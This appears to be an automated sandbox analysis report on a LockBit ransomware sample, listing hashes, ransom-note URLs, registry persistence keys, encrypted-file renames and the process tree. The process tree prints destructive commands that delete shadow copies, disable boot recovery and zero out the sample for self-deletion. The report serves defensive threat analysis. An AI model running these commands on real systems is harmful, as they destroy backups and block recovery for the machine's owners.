Analysis
-
max time kernel
91s -
max time network
105s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
12-12-2022 09:41
Static task
static1
Behavioral task
behavioral1
Sample
6150.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
6150.exe
Resource
win10v2004-20220901-en
General
-
Target
6150.exe
-
Size
959KB
-
MD5
df7a9a45a10c1942225eb9be257fb752
-
SHA1
874630d6f4bdf9224125d35f30c48bc6d1da8ec1
-
SHA256
c3230c24b469fe5d82786444d3c7a7d16d78eb65581c814dbc5329a80b65481f
-
SHA512
c812b5bfbba51b196954e0c14668e3b46b79db3c62848a8be4f96ef12105948e22e41949c5a62e661ddda0126900d5058cf641b3351fa4b0ce0a3e7fd2aecbe2
-
SSDEEP
24576:uLjr3s2nScu1i1tz3f++5kRzFxk7rMxNeR1R9qpdsF:Ujrc2So1Ff+B3k796e
Malware Config
Extracted
C:\odt\Restore-My-Files.txt
http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
https://bigblog.at
http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion
http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion
https://decoding.at
Extracted
C:\Users\Admin\Desktop\LockBit_Ransomware.hta
https://decoding.at/
http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion/or
https://decoding.at
http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion
https://bigblog.at
Signatures
-
Lockbit
Ransomware family with multiple variants released since late 2019.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1068 bcdedit.exe 1344 bcdedit.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
6150.exedescription ioc process File renamed C:\Users\Admin\Pictures\PublishStop.tif => C:\users\admin\pictures\publishstop.tif.lockbit 6150.exe File renamed C:\Users\Admin\Pictures\SwitchImport.tif => C:\users\admin\pictures\switchimport.tif.lockbit 6150.exe File renamed C:\Users\Admin\Pictures\UseRename.raw => C:\users\admin\pictures\userename.raw.lockbit 6150.exe File renamed C:\Users\Admin\Pictures\AssertRead.raw => C:\users\admin\pictures\assertread.raw.lockbit 6150.exe File renamed C:\Users\Admin\Pictures\BackupRequest.png => C:\users\admin\pictures\backuprequest.png.lockbit 6150.exe File renamed C:\Users\Admin\Pictures\NewShow.raw => C:\users\admin\pictures\newshow.raw.lockbit 6150.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
6150.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation 6150.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
6150.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6150.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{E7894974-2828-CFE0-79A7-7920B9D0E148} = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\6150.exe\"" 6150.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\Users\\Admin\\Desktop\\LockBit_Ransomware.hta" 6150.exe -
Drops file in System32 directory 1 IoCs
Processes:
6150.exedescription ioc process File created C:\windows\SysWOW64\F189D8.ico 6150.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
6150.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9B84.tmp.bmp" 6150.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
Processes:
6150.exepid process 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe -
Drops file in Program Files directory 64 IoCs
Processes:
6150.exedescription ioc process File opened for modification C:\program files\microsoft office\root\licenses16\projectpror_retail-ppd.xrm-ms 6150.exe File created C:\program files\microsoft office\root\vfs\programfilesx64\microsoft analysis services\as oledb\140\resources\1033\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\videolan\vlc\locale\ta\lc_messages\vlc.mo 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\aicuc\js\nls\it-it\ui-strings.js 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-explorer.xml 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\homebusinessr_retail2-pl.xrm-ms 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\professionalr_grace-ppd.xrm-ms 6150.exe File created C:\program files\microsoft office\root\office16\addins\powerpivot excel add-in\resources\1033\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\microsoft office\root\office16\bibliography\style\harvardanglia2008officeonline.xsl 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\my-computer\js\nls\he-il\ui-strings.js 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\visiostdxc2rvl_makc2r-pl.xrm-ms 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_cn.jar 6150.exe File opened for modification C:\program files\microsoft office\root\office16\logoimages\winwordlogo.contrast-black_scale-180.png 6150.exe File opened for modification C:\program files\videolan\vlc\lua\http\mobile_browse.html 6150.exe File created C:\program files\java\jdk1.8.0_66\lib\missioncontrol\dropins\Restore-My-Files.txt 6150.exe File created C:\program files\java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\meta-inf\Restore-My-Files.txt 6150.exe File created C:\program files\microsoft office\root\office16\fpa_fa000000011\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\microsoft office\root\vfs\programfilesx86\microsoft office\office16\dcf\en\spreadsheetcompare_k_col.hxk 6150.exe File opened for modification C:\program files\java\jre1.8.0_66\lib\security\java.policy 6150.exe File opened for modification C:\program files\microsoft office\root\office16\logoimages\firstrunlogo.scale-80.png 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\generic-rhp-app\images\themes\dark\Restore-My-Files.txt 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\ui-strings.js 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\on-boarding\images\themeless\localized_images\zh-cn\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_cn.jar 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\core\dev\nls\en-ae\Restore-My-Files.txt 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\signatures\js\nls\ru-ru\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\microsoft office\root\office16\pagesize\pglbl082.xml 6150.exe File created C:\program files\videolan\vlc\locale\fur\lc_messages\Restore-My-Files.txt 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\my-computer\js\nls\sl-si\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_cn.jar 6150.exe File created C:\program files\microsoft office\root\office16\msipc\zh-cn\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-charts.xml 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\access2019vl_mak_ae-ppd.xrm-ms 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\proplus2019r_oem_perp-ppd.xrm-ms 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\themes\dark\share.svg 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\on-boarding\images\themeless\localized_images\zh-cn\playstore_icon.svg 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-swing-tabcontrol.xml 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\tracker\review_same_reviewers.gif 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64_3.103.1.v20140903-1947.jar 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sampler_ja.jar 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\visiopror_retail2-ul-phn.xrm-ms 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\s_illuccfilesempty_180x180.svg 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\sign-services-auth\js\Restore-My-Files.txt 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\projectstd2019r_oem_perp-ul-phn.xrm-ms 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\proplusr_trial-pl.xrm-ms 6150.exe File opened for modification C:\program files\videolan\vlc\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_cn.jar 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\projectstdco365r_subtest-ppd.xrm-ms 6150.exe File opened for modification C:\program files\mozilla firefox\firefox.cfg 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\images\file_types\themes\dark\selection-actions2x.png 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\add-account\js\nls\sl-si\ui-strings.js 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\app-center\images\themeless\mobile_fillsign_logo.svg 6150.exe File opened for modification C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\ob-preview\js\nls\eu-es\ui-strings.js 6150.exe File opened for modification C:\program files\java\jdk1.8.0_66\db\lib\derbylocale_zh_cn.jar 6150.exe File opened for modification C:\program files\microsoft office\root\document themes 16\theme fonts\century schoolbook.xml 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\proplusr_oem_perp3-ppd.xrm-ms 6150.exe File opened for modification C:\program files\microsoft office\root\licenses16\word2019vl_mak_ae-ul-phn.xrm-ms 6150.exe File created C:\program files (x86)\adobe\acrobat reader dc\reader\webresources\resource0\static\js\plugins\reviews\js\nls\eu-es\Restore-My-Files.txt 6150.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3112 vssadmin.exe -
Modifies Control Panel 2 IoCs
Processes:
6150.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\WallpaperStyle = "2" 6150.exe Set value (str) \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\Desktop\TileWallpaper = "0" 6150.exe -
Modifies registry class 15 IoCs
Processes:
6150.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lockbit\ = "LockBit" 6150.exe Key created \Registry\Machine\Software\Classes\Lockbit\shell\Open 6150.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Lockbit\ = "LockBit Class" 6150.exe Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings 6150.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lockbit\DefaultIcon\ = "C:\\windows\\SysWow64\\F189D8.ico" 6150.exe Key created \Registry\Machine\Software\Classes\htafile\DefaultIcon 6150.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htafile\DefaultIcon\ = "C:\\windows\\SysWow64\\F189D8.ico" 6150.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Lockbit\DefaultIcon\ = "C:\\windows\\SysWow64\\F189D8.ico" 6150.exe Key created \Registry\Machine\Software\Classes\Lockbit\shell\Open\Command 6150.exe Key created \Registry\Machine\Software\Classes\.lockbit 6150.exe Key created \Registry\Machine\Software\Classes\.lockbit\DefaultIcon 6150.exe Key created \Registry\Machine\Software\Classes\Lockbit 6150.exe Key created \Registry\Machine\Software\Classes\Lockbit\DefaultIcon 6150.exe Key created \Registry\Machine\Software\Classes\Lockbit\shell 6150.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Lockbit\shell\Open\Command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Admin\\Desktop\\LockBit_Ransomware.hta\"" 6150.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
6150.exepid process 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe 4828 6150.exe -
Suspicious use of AdjustPrivilegeToken 47 IoCs
Processes:
6150.exevssvc.exeWMIC.exedescription pid process Token: SeTakeOwnershipPrivilege 4828 6150.exe Token: SeDebugPrivilege 4828 6150.exe Token: SeBackupPrivilege 5108 vssvc.exe Token: SeRestorePrivilege 5108 vssvc.exe Token: SeAuditPrivilege 5108 vssvc.exe Token: SeIncreaseQuotaPrivilege 3360 WMIC.exe Token: SeSecurityPrivilege 3360 WMIC.exe Token: SeTakeOwnershipPrivilege 3360 WMIC.exe Token: SeLoadDriverPrivilege 3360 WMIC.exe Token: SeSystemProfilePrivilege 3360 WMIC.exe Token: SeSystemtimePrivilege 3360 WMIC.exe Token: SeProfSingleProcessPrivilege 3360 WMIC.exe Token: SeIncBasePriorityPrivilege 3360 WMIC.exe Token: SeCreatePagefilePrivilege 3360 WMIC.exe Token: SeBackupPrivilege 3360 WMIC.exe Token: SeRestorePrivilege 3360 WMIC.exe Token: SeShutdownPrivilege 3360 WMIC.exe Token: SeDebugPrivilege 3360 WMIC.exe Token: SeSystemEnvironmentPrivilege 3360 WMIC.exe Token: SeRemoteShutdownPrivilege 3360 WMIC.exe Token: SeUndockPrivilege 3360 WMIC.exe Token: SeManageVolumePrivilege 3360 WMIC.exe Token: 33 3360 WMIC.exe Token: 34 3360 WMIC.exe Token: 35 3360 WMIC.exe Token: 36 3360 WMIC.exe Token: SeIncreaseQuotaPrivilege 3360 WMIC.exe Token: SeSecurityPrivilege 3360 WMIC.exe Token: SeTakeOwnershipPrivilege 3360 WMIC.exe Token: SeLoadDriverPrivilege 3360 WMIC.exe Token: SeSystemProfilePrivilege 3360 WMIC.exe Token: SeSystemtimePrivilege 3360 WMIC.exe Token: SeProfSingleProcessPrivilege 3360 WMIC.exe Token: SeIncBasePriorityPrivilege 3360 WMIC.exe Token: SeCreatePagefilePrivilege 3360 WMIC.exe Token: SeBackupPrivilege 3360 WMIC.exe Token: SeRestorePrivilege 3360 WMIC.exe Token: SeShutdownPrivilege 3360 WMIC.exe Token: SeDebugPrivilege 3360 WMIC.exe Token: SeSystemEnvironmentPrivilege 3360 WMIC.exe Token: SeRemoteShutdownPrivilege 3360 WMIC.exe Token: SeUndockPrivilege 3360 WMIC.exe Token: SeManageVolumePrivilege 3360 WMIC.exe Token: 33 3360 WMIC.exe Token: 34 3360 WMIC.exe Token: 35 3360 WMIC.exe Token: 36 3360 WMIC.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
6150.execmd.execmd.exedescription pid process target process PID 4828 wrote to memory of 1996 4828 6150.exe cmd.exe PID 4828 wrote to memory of 1996 4828 6150.exe cmd.exe PID 1996 wrote to memory of 3112 1996 cmd.exe vssadmin.exe PID 1996 wrote to memory of 3112 1996 cmd.exe vssadmin.exe PID 1996 wrote to memory of 3360 1996 cmd.exe WMIC.exe PID 1996 wrote to memory of 3360 1996 cmd.exe WMIC.exe PID 1996 wrote to memory of 1068 1996 cmd.exe bcdedit.exe PID 1996 wrote to memory of 1068 1996 cmd.exe bcdedit.exe PID 1996 wrote to memory of 1344 1996 cmd.exe bcdedit.exe PID 1996 wrote to memory of 1344 1996 cmd.exe bcdedit.exe PID 4828 wrote to memory of 4484 4828 6150.exe mshta.exe PID 4828 wrote to memory of 4484 4828 6150.exe mshta.exe PID 4828 wrote to memory of 4484 4828 6150.exe mshta.exe PID 4828 wrote to memory of 396 4828 6150.exe cmd.exe PID 4828 wrote to memory of 396 4828 6150.exe cmd.exe PID 4828 wrote to memory of 396 4828 6150.exe cmd.exe PID 396 wrote to memory of 2456 396 cmd.exe PING.EXE PID 396 wrote to memory of 2456 396 cmd.exe PING.EXE PID 396 wrote to memory of 2456 396 cmd.exe PING.EXE PID 396 wrote to memory of 4184 396 cmd.exe fsutil.exe PID 396 wrote to memory of 4184 396 cmd.exe fsutil.exe PID 396 wrote to memory of 4184 396 cmd.exe fsutil.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6150.exe"C:\Users\Admin\AppData\Local\Temp\6150.exe"1⤵
- Modifies extensions of user files
- Checks computer location settings
- Adds Run key to start application
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4828 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no2⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3112
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3360
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1068
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no3⤵
- Modifies boot configuration data using bcdedit
PID:1344
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit_Ransomware.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵PID:4484
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\6150.exe" & Del /f /q "C:\Users\Admin\AppData\Local\Temp\6150.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:396 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- Runs ping.exe
PID:2456
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 "C:\Users\Admin\AppData\Local\Temp\6150.exe"3⤵PID:4184
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5108
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
46KB
MD5c15c6adc8c923ad87981f289025c37b2
SHA1bfe6533f4afe3255046f7178f289a4c75ad89e76
SHA25690f3a33919fdd766e90fd96f8f20a92c2d1376b7cfdc8b738c2f8e7e6c7498b1
SHA51231dd03b208e00ac012fbe4189d5af1306cc8e3640d40efefab4aa1cabab3c4735eef0cb65e7750c3c77021934e145398e5e26389975cf36b193c8f622a5fde83